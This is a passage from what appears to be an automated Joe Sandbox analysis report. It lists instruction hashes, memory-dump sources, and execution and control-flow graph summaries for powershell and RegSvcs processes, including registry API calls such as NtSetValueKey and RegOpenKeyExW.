                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 4ea6e59c24f813e21ecd7355becf31316345a592f09a20aac7558736a7eb16fc
                                                                                                                                                                                                  • Instruction ID: b773fb530cb4846a035c1034739766738d27d3c187971a913fd083657fc3414c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ea6e59c24f813e21ecd7355becf31316345a592f09a20aac7558736a7eb16fc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85112B21F1CC474FE359B63C44591BDAA82DFD7392F0882BAC049C72EBEE2858454384
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2410046319.00007FF8489D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489D0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff8489d0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a0cc4edd65eb45bce2752527bde44fb3cbbbcf3a68919ee5af33a8a9304783e7
                                                                                                                                                                                                  • Instruction ID: 1dd79d4a51478b2dd604d58000a1419528628f0e888f2bea85cfadda2fb54a93
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0cc4edd65eb45bce2752527bde44fb3cbbbcf3a68919ee5af33a8a9304783e7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6801EFA680FBC60FE347537A08680907FB19E2316174E06EBC0C5CF1B3E48E185AC72A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2407942299.00007FF848900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848900000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff848900000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                  • Instruction ID: 499782a85436c748c9745de400d045b42a67cca2cbc1106d65bb2c329d186d80
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6201677111CB0D4FD744EF0CE451AAAB7E0FB95364F10056DE58AC3655D736E882CB45
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2410046319.00007FF8489D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489D0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff8489d0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 19b7e2048fa0e2b0623ebfa173c5bda86474937644e4188ac0e51c988ab6f72a
                                                                                                                                                                                                  • Instruction ID: 9e41f4c61c4ce0d656654408a78093f9faf8ab67632a5b5bbec584f59040d0c0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19b7e2048fa0e2b0623ebfa173c5bda86474937644e4188ac0e51c988ab6f72a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9F05923F0DD5A1FF7A5A62C38192F49BC1DF549A1B0802B7C50CC3147DE044C140788
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2407942299.00007FF848900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848900000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff848900000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 82af515c0c8c9ad72d9ee17629b6441ba60c76668e35f83d0d863c7c984f8f36
                                                                                                                                                                                                  • Instruction ID: b17d081a42abab8b643c114f3e37e2dd543720def7d9f812628ac38bde925357
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82af515c0c8c9ad72d9ee17629b6441ba60c76668e35f83d0d863c7c984f8f36
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1F01774D0860F8FDB40EFA8C4855EEBBB0EF46351F204525C016EA290EB38AA448F94
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2407942299.00007FF848900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848900000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff848900000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 594712b79907145f958f02ab86b3917b0bc1bb9a9745890c442681a12eb6bdd7
                                                                                                                                                                                                  • Instruction ID: 46e9f4ba5b565c1a2f55ebab0173ee5fce84ac686adee407d7891013f4ac028b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 594712b79907145f958f02ab86b3917b0bc1bb9a9745890c442681a12eb6bdd7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FD01721B4CE1D0B9668B92CA80A16A73C2DBC9262B45867FE44ED2245DE2998820385
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2407942299.00007FF848900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848900000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff848900000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: cf0a034da687b7e03ccef9b3aa329083b6f958f03b9b8e02b8e7c87f74c7f05c
                                                                                                                                                                                                  • Instruction ID: 3e238fcbab9634f638985aedf7a96310bae73fb80d2bcda6118d6016cc33678d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf0a034da687b7e03ccef9b3aa329083b6f958f03b9b8e02b8e7c87f74c7f05c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7E0D810B0C7858FE749FB38049653DADD09F47280F9050BDD85AC72D3ED6C5805D305
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2407942299.00007FF848900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848900000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff848900000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e1d48d1ff8d7082587831e7a406b34eb3c1619b8831c351a242c584725f089d2
                                                                                                                                                                                                  • Instruction ID: 88213207c40150f6d44f3d91774bdda3d7bff2771c9d28e9cbdaf030ee2a2901
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1d48d1ff8d7082587831e7a406b34eb3c1619b8831c351a242c584725f089d2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43C0803151C6114FD52E652440151357577FB46102B31507DDD87D71D6DF396C01C749
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2407942299.00007FF848900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848900000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff848900000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 50a5c83b6a98d75cf5629a2d53223970be0b58fee48d6bd67eb53a66e4f0a8c4
                                                                                                                                                                                                  • Instruction ID: 330f30164d5f6fbfc77128036f32247613e4ecccce40176a5e026d75d8a6cf49
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50a5c83b6a98d75cf5629a2d53223970be0b58fee48d6bd67eb53a66e4f0a8c4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADA0110AE0C8028AE0803320802803C08038B822A2F280232820A820C2AE08AA08208B

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:33.4%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                  Signature Coverage:50%
                                                                                                                                                                                                  Total number of Nodes:12
                                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                                  execution_graph 289 1950ee0 290 1950f28 NtSetValueKey 289->290 291 1950faa 290->291 296 1950cb0 297 1950cb8 RegOpenKeyExW 296->297 299 1950d96 297->299 304 1950ff9 305 1951000 RegCloseKey 304->305 307 195108f 305->307 300 1950ed8 301 1950edd NtSetValueKey 300->301 303 1950faa 301->303

                                                                                                                                                                                                  Callgraph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                                  • Disassembly available
                                                                                                                                                                                                  callgraph 0 Function_01950194 1 Function_01950210 2 Function_01950090 3 Function_0195021C 4 Function_0195011C 5 Function_01950485 6 Function_01950204 7 Function_01950006 8 Function_01950481 9 Function_01951000 10 Function_01950080 11 Function_01950100 12 Function_0195048D 13 Function_0195010C 14 Function_01950489 15 Function_01950188 16 Function_019504B5 17 Function_019504B1 18 Function_019500B0 19 Function_01950CB0 20 Function_0195013C 21 Function_019500BC 22 Function_019501BC 23 Function_01950239 24 Function_01950CB8 25 Function_01950C38 26 Function_019504A5 27 Function_019500A0 28 Function_019501A0 29 Function_019504AD 30 Function_0195012C 31 Function_019501AC 32 Function_01950A2C 63 Function_019504F8 32->63 33 Function_019504A9 34 Function_01950228 35 Function_01950154 36 Function_019500D4 37 Function_019501D4 38 Function_01950450 39 Function_019508D0 40 Function_0195045C 41 Function_01950DD9 42 Function_01950E58 43 Function_01950ED8 44 Function_01950444 45 Function_01950843 46 Function_0195004D 47 Function_01950C48 48 Function_01950848 49 Function_01950148 50 Function_019500C8 51 Function_019501C8 52 Function_01950475 53 Function_019504F5 54 Function_019501F4 55 Function_01950471 56 Function_01950070 57 Function_019500F0 58 Function_01950170 59 Function_0195047D 60 Function_0195017C 61 Function_01950479 62 Function_01950FF9 64 Function_019509FA 64->25 64->47 64->63 65 Function_019500E4 66 Function_019501E4 67 Function_01950EE0 68 Function_019508E0 69 Function_01950160 70 Function_01950060 71 Function_0195046D 72 Function_01950469 73 Function_01950E68 74 Function_01950DE8

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 17 1950ed8-1950fa8 NtSetValueKey 21 1950fb1-1950fe9 17->21 22 1950faa-1950fb0 17->22 22->21
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • NtSetValueKey.NTDLL(?,?,?,?,?,?), ref: 01950F98
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.2124984781.0000000001950000.00000040.00000800.00020000.00000000.sdmp, Offset: 01950000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1950000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                  • Opcode ID: 805ad4474ada3120d39fcf4ef6f22c20955f78a4d6d0395cfadc0ec2854b9838
                                                                                                                                                                                                  • Instruction ID: 5416cf8f4dc99fc39ea4e7ef22da6305af901c6873f89ffb50ee810b967ede54
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 805ad4474ada3120d39fcf4ef6f22c20955f78a4d6d0395cfadc0ec2854b9838
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 354176B9D042589FCF10CFA9D984A9EFBF5BB1A310F24A01AE818B7250D771A941CB64

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 25 1950ee0-1950fa8 NtSetValueKey 27 1950fb1-1950fe9 25->27 28 1950faa-1950fb0 25->28 28->27
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • NtSetValueKey.NTDLL(?,?,?,?,?,?), ref: 01950F98
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.2124984781.0000000001950000.00000040.00000800.00020000.00000000.sdmp, Offset: 01950000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1950000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                  • Opcode ID: 2ed995f351bc607449c16bde76cd88f768e6f7b3ebab033fed5f8ad5ec4d06f1
                                                                                                                                                                                                  • Instruction ID: c4e1bf35da87170b55254b50d2ab991b59fdc9c81c330642e27d35334138ec7d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ed995f351bc607449c16bde76cd88f768e6f7b3ebab033fed5f8ad5ec4d06f1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F3165B9D042589FCF10CFA9D984A9EFBF5BB1A310F24A01AE818B7210D375A941CF64

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.2124984781.0000000001950000.00000040.00000800.00020000.00000000.sdmp, Offset: 01950000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1950000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 879a6ccc56a134426d9242d63b44b64e4d50c83ac7ca3c8f38a7bdd44f59c8c6
                                                                                                                                                                                                  • Instruction ID: 0e5b9ea85393bb77e4c551f06b98ce59aa99c1c1d8a35a01248946ccd8ef73f6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 879a6ccc56a134426d9242d63b44b64e4d50c83ac7ca3c8f38a7bdd44f59c8c6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D610434E01219CFCB64DFA8D894AEDFBB5BF49300F249169E809B7254DB30AA85CF54

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 0 1950cb0-1950d1f 3 1950d21-1950d30 0->3 4 1950d33-1950d94 RegOpenKeyExW 0->4 3->4 5 1950d96-1950d9c 4->5 6 1950d9d-1950dd3 4->6 5->6
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(?,?,?,?,?), ref: 01950D84
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.2124984781.0000000001950000.00000040.00000800.00020000.00000000.sdmp, Offset: 01950000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1950000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                                                                  • Opcode ID: 9b669dfd59cf0d767df27c059239be113c3c2d006940e7f45288aaa6cb58d710
                                                                                                                                                                                                  • Instruction ID: 77a52fa93e675343c8a9cad09a3ca255a3647aeab9da661c06d5d99867e3db61
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b669dfd59cf0d767df27c059239be113c3c2d006940e7f45288aaa6cb58d710
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D4177B9D042589FCB10CFA9D984ADEFBF5BF49310F14902AE918B7220D335A946CF64

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 9 1950cb8-1950d1f 11 1950d21-1950d30 9->11 12 1950d33-1950d94 RegOpenKeyExW 9->12 11->12 13 1950d96-1950d9c 12->13 14 1950d9d-1950dd3 12->14 13->14
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(?,?,?,?,?), ref: 01950D84
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.2124984781.0000000001950000.00000040.00000800.00020000.00000000.sdmp, Offset: 01950000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1950000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                                                                  • Opcode ID: 69d137eb7bbb84f640e754aac435633b62f3e74dfc4e58053a2d63a5d92b3fa8
                                                                                                                                                                                                  • Instruction ID: 91365ab84003e168197b5bc53ab94ee45d1f0e4d53dedcf3dcaaf79d5beb8f2c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69d137eb7bbb84f640e754aac435633b62f3e74dfc4e58053a2d63a5d92b3fa8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 104165B9D042589FCF10CFA9D984ADEFBF5BB49310F14902AE918B7220D375A946CF64

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 31 1950ff9-195103d 33 1951045-195108d RegCloseKey 31->33 34 1951096-19510d0 33->34 35 195108f-1951095 33->35 35->34
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegCloseKey.KERNELBASE(?), ref: 0195107D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.2124984781.0000000001950000.00000040.00000800.00020000.00000000.sdmp, Offset: 01950000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1950000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                                  • Opcode ID: ab48001ac4f9f2a0c168f530cee0309e89019251cb0d0208ee5a58b9c6835a56
                                                                                                                                                                                                  • Instruction ID: 9fdc6350c6643250c49c8b82250f2f99418c6961db4dc96a98dba142b95dcbc5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab48001ac4f9f2a0c168f530cee0309e89019251cb0d0208ee5a58b9c6835a56
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E431A9B8D012589FCB10CFA9D984A9EFBF4FB49310F14902AE818B7311D735A941CF64

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 39 1951000-195108d RegCloseKey 41 1951096-19510d0 39->41 42 195108f-1951095 39->42 42->41
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegCloseKey.KERNELBASE(?), ref: 0195107D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.2124984781.0000000001950000.00000040.00000800.00020000.00000000.sdmp, Offset: 01950000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1950000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                                  • Opcode ID: 07176289b7fc07686cbdc89f021e130aacce66f7a51216cfb9bab1650ce674d8
                                                                                                                                                                                                  • Instruction ID: fa14b2193f2bcd13cd33b75ce6d340a9472e8265aa4496b949ee66abd99955eb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07176289b7fc07686cbdc89f021e130aacce66f7a51216cfb9bab1650ce674d8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D13198B8D012589FCB10CFA9D984A9EFBF4FB49310F14942AE818B7310D735A941CF64
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: fjq$ fjq$4'eq
                                                                                                                                                                                                  • API String ID: 0-1006182435
                                                                                                                                                                                                  • Opcode ID: 65308ce1596d10406b11168efcf97df97358350e9f6f75d6449bd89bdf1493e1
                                                                                                                                                                                                  • Instruction ID: 7a9c435190c43dd01599809cf4609af37f47690ba5bf96e7f70bd044b5a5a0cc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65308ce1596d10406b11168efcf97df97358350e9f6f75d6449bd89bdf1493e1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34F20F78B10124DFC749EB64DAA4EAE77F2BF8C708F1146A5D4469B768DA306D42CF80
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: fjq$ fjq$4'eq
                                                                                                                                                                                                  • API String ID: 0-1006182435
                                                                                                                                                                                                  • Opcode ID: 7e9431a2fb16abc7c88afbce3d745685d2a7c5fed2fdd08036dcc25ce95ea8d5
                                                                                                                                                                                                  • Instruction ID: 9186dfc7205c5bc97122a7991c291d19fabd03e2ce1f73089c2dfa45478d2ed1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e9431a2fb16abc7c88afbce3d745685d2a7c5fed2fdd08036dcc25ce95ea8d5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AF2EF78B10124DFC749EB64DAA4EAE77F1BF8C708F1146A5D44A9B768DA306D42CF80
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Ep
                                                                                                                                                                                                  • API String ID: 0-2664974837
                                                                                                                                                                                                  • Opcode ID: 9bd17a0d74d89aec6d3f81de210f5ae3cc3d7556fca9a0cbd373ae509e204f20
                                                                                                                                                                                                  • Instruction ID: 8589311157afbfe4ee30751e84fd99dc990e00731c3a17d0954bab9372156370
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9bd17a0d74d89aec6d3f81de210f5ae3cc3d7556fca9a0cbd373ae509e204f20
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DD12F74B00129CFD785EB28D6A8A6E7BF2FB88314F1145A9D4099B799DF349D42CF80
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Ep
                                                                                                                                                                                                  • API String ID: 0-2664974837
                                                                                                                                                                                                  • Opcode ID: 4b97bc69e1f07a34e301f35dce85decbe8376ead82193d9a15370574924c3179
                                                                                                                                                                                                  • Instruction ID: a13793b086d0bf21abf20e855b5890fac5cd75be1a0fdc82a5aa3b2684646645
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b97bc69e1f07a34e301f35dce85decbe8376ead82193d9a15370574924c3179
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FC11E74B001298FD745EB28D6A8A6E7BF2FB88314F2145A9D409DB799DF349D42CF80
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Ep
                                                                                                                                                                                                  • API String ID: 0-2664974837
                                                                                                                                                                                                  • Opcode ID: cfd65021630a8c1e453e3ff720c8bf4d134617cf523989a0276aab85dc27be74
                                                                                                                                                                                                  • Instruction ID: 9769e4743b12c1c14b5e14993ae476db7b76b2773c5b02343c3582d0862643d4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfd65021630a8c1e453e3ff720c8bf4d134617cf523989a0276aab85dc27be74
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55A11F74B001198FD745EB28D668A6E7BF2FB88314F2145A9E809DB799DF349D42CF80
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Hkq$PHeq$PHeq$iq
                                                                                                                                                                                                  • API String ID: 0-529301197
                                                                                                                                                                                                  • Opcode ID: c32ac43997b79751379a1442fe22d496e48ce0dc950fa8ce501d9e709afc699d
                                                                                                                                                                                                  • Instruction ID: 89af65cb0b8a5ff4bc4461458d8232b808998fb82f08f881f3ed4574248e55d2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c32ac43997b79751379a1442fe22d496e48ce0dc950fa8ce501d9e709afc699d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2124D34A007058FCB65DF78C550A5EB7F2EF85310F648A6DD406AB3A5DBB4E982CB80
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 4'eq$|>lq$|>lq
                                                                                                                                                                                                  • API String ID: 0-3146283076
                                                                                                                                                                                                  • Opcode ID: 40fccd0c93295472e91ca5f8b48cf6eaff56aa02a7ffcf271c0c70e1414cee3e
                                                                                                                                                                                                  • Instruction ID: 5f5eb196826ace4b8c83545fa37c1aa231f4bbf354e1fb1fe156170eaa07ca42
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40fccd0c93295472e91ca5f8b48cf6eaff56aa02a7ffcf271c0c70e1414cee3e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6031A4742047409FC357EF28D844A9B7FE6EF89310B58CA5EE0458F3A2DB21E9058B95
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3293019451.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
